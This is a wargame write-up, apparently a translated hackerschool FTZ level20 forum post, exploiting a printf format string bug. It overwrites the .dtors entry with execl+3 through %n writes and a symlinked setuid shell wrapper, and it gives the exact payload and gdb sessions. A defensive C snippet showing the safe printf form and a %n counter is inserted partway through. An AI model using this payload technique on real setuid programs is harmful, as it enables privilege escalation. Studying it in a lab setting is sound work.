http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2592 [copy]
Using a format string bug,
change the .dtors (destructor) area to the execution address of the library function execl,
and run a shell.
-----------------------------------------------------------
[level20@ftz level20]$ ls
attackme hint public_html tmp
[level20@ftz level20]$ cat hint
#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
setreuid(3101,3101);
fgets(bleh,79,stdin);
printf(bleh);
}
[level20@ftz level20]$ cd tmp
[level20@ftz tmp]$ ls
in ppp
[level20@ftz tmp]$ cd in
[level20@ftz in]$ ls
? ???@@??? egg egg.c sh sh.c vul vul.c
[level20@ftz in]$ objdump -s -j .dtors ~/attackme
/home/level20/attackme: file format elf32-i386
Contents of section .dtors:
8049594 ffffffff 00000000 ........
[level20@ftz in]$ ~/attackme
AAAABBBB%8x%8x%8x%8x%8x
AAAABBBB 4f401574604009d5004141414142424242
[level20@ftz in]$
/// From the results above, we can plan the address of the dtors area and the structure of the $flag format string.
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483be in main ()
(gdb) disass execl
Dump of assembler code for function execl:
0x400d16c0 <execl+0>: push %ebp
0x400d16c1 <execl+1>: mov %esp,%ebp
0x400d16c3 <execl+3>: push %edi
.....
0x16c3=5827
0x400d=16397
5827-8=5819
16397-5827=10570
(python -c 'print "\x98\x95\x04\x08\x9a\x95\x04\x08%5819x%4$n%10570x%5$n"';cat) | ~/attackme
/// The attack code above is now complete.
/// What the attack code does is use the target program's format string bug
/// to write the address of execl (precisely execl+3) into the dtors area, so that execl gets executed.
/// However, execl needs arguments, in a form like execl("/bin/sh","/bin/sh",0).
/// Without arguments it becomes execl(0), and the effort of modifying the dtors area to run execl is wasted.
/// It is hard to write the desired argument values right away.
/// That is why the dtors area is overwritten with the address of execl+3, not execl+0.
/// execl recognizes(?) its arguments relative to $ebp...
/// It takes the address pointed to by the value stored at $ebp+8 as its argument.
/// 0x400d16c0 <execl+0>: push %ebp
/// 0x400d16c1 <execl+1>: mov %esp,%ebp
/// Once the two-line prologue above has run, %ebp is re-initialized, so the value at $ebp+8 becomes 0x00000001.
/// Anyway...
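The hardened counterpart of the page's printf(bleh), plus a small check over the two lines fed to attackme above, as an added example in C that is not part of the original post; echo_safe, count_directives and count_writes are names chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the original post. The page's printf(bleh) makes
 * user input the format string, so "%x" reads the stack and "%n" writes
 * memory; gcc rejects that line under -Werror=format-security. */

/* Hardened form: input is only ever a %s argument, so any directives in it
 * are printed literally, never interpreted. */
static void echo_safe(const char *line) {
    printf("%s", line);                 /* or fputs(line, stdout) */
}

/* Count printf conversion directives in a line ("%%" is a literal percent)
 * and store the number of "%n" memory-write directives in *n_writes. */
int count_directives(const char *line, int *n_writes) {
    int total = 0;
    *n_writes = 0;
    for (const char *p = line; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }            /* escaped percent */
        total++;
        /* skip positional "4$", flags, width, precision, length modifiers */
        const char *q = p + 1;
        while (*q && strchr("0123456789$-+ #.*hlLqjzt", *q)) q++;
        if (*q == 'n') (*n_writes)++;
        p = *q ? q : q - 1;                            /* resume after it */
    }
    return total;
}

/* Convenience: only the number of "%n" writes in a line. */
int count_writes(const char *line) {
    int w;
    count_directives(line, &w);
    return w;
}

/* Constructed sample: the payload line fed to attackme on the page. */
int main(void) {
    const char *payload = "\x98\x95\x04\x08\x9a\x95\x04\x08%5819x%4$n%10570x%5$n";
    int w, n = count_directives(payload, &w);
    printf("payload: %d directives, %d %%n writes\n", n, w);
    echo_safe(payload);                 /* printed verbatim, nothing interpreted */
    putchar('\n');
    return 0;
}
```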
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483be in main ()
(gdb) x/16wx 0x08049594
0x8049594 <__DTOR_LIST__>: 0xffffffff 0x00000000 0x00000000 0x080494c4
0x80495a4 <_GLOBAL_OFFSET_TABLE_+4>: 0x40015a38 0x4000bcb0 0x080482ce 0x40038850
0x80495b4 <_GLOBAL_OFFSET_TABLE_+20>: 0x080482ee 0x080482fe 0x00000000 0x40157460
0x80495c4 <completed.1>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) set *0x08049598=0x400d16c3 /// overwrite the .dtors entry with the address of execl+3.
(gdb) br *execl+3
Breakpoint 2 at 0x400d16c3
(gdb) c
Continuing.
aaaa
aaaa
Breakpoint 2, 0x400d16c3 in execl () from /lib/libc.so.6
(gdb) x/16wx $ebp+8
0xbffffab0: 0x401597b8 0x401591c0 0xbffffad8 0x4004d940
0xbffffac0: 0x00000000 0x00000005 0x4004d8db 0x401591c0
0xbffffad0: 0x40015360 0xbffffb24 0xbffffaf8 0x4003891f
0xbffffae0: 0x00000005 0xbffffb24 0xbffffb2c 0x4001582c
(gdb) x/x 0x401597b8
0x401597b8 <initial+24>: 0x00000004
(gdb)
0x401597bc <initial+28>: 0x08048438
(gdb) x/s 0x401597b8
0x401597b8 <initial+24>: "\004"
(gdb) q
The program is running. Exit anyway? (y or n) y
[level20@ftz in]$ cat sh.c
int main()
{
setuid(0);
system("/bin/sh");
}
[level20@ftz in]$ gcc -o sh sh.c
[level20@ftz in]$ ln -s sh `printf "\x04"`
[level20@ftz in]$ (python -c 'print "\x98\x95\x04\x08\x9a\x95\x04\x08%5819x%4$n%10570x%5$n"';cat) | ~/attackme
.........
40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
exit
[level20@ftz in]$
-------------------------------------------------------
Note:
When the address of execl+0 (0x400d16c0)
is written into .dtors (0x08049598),
check the value at $ebp+8 that execl takes as its argument:
[level20@ftz in]$ objdump -s -j .dtors ~/attackme
/home/level20/attackme: file format elf32-i386
Contents of section .dtors:
8049594 ffffffff 00000000 ........
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483be in main ()
(gdb) set *0x08049598=0x400d16c0
(gdb) br *execl+3
Breakpoint 2 at 0x400d16c3
(gdb) c
Continuing.
aaaa
aaaa
Breakpoint 2, 0x400d16c3 in execl () from /lib/libc.so.6
(gdb) x/16wx $ebp+8
0xbffffaa0: 0x00000001 0x00000000 0xbffffab8 0x080484a6
0xbffffab0: 0x401597b8 0x401591c0 0xbffffad8 0x4004d940
0xbffffac0: 0x00000000 0x00000005 0x4004d8db 0x401591c0
0xbffffad0: 0x40015360 0xbffffb24 0xbffffaf8 0x4003891f
(gdb) x/x 0x00000001
0x1: Cannot access memory at address 0x1
(gdb) x/s 0x00000001
0x1: <Address 0x1 out of bounds>
/// That is why it must be overwritten with the address of execl+3 (0x400d16c3).
-------------------------------------------------
Open question :: Even after changing it to the address of execl+3,
what should be done if there is no value usable as the argument?
Hit : 4121 Date : 2007/11/30 08:59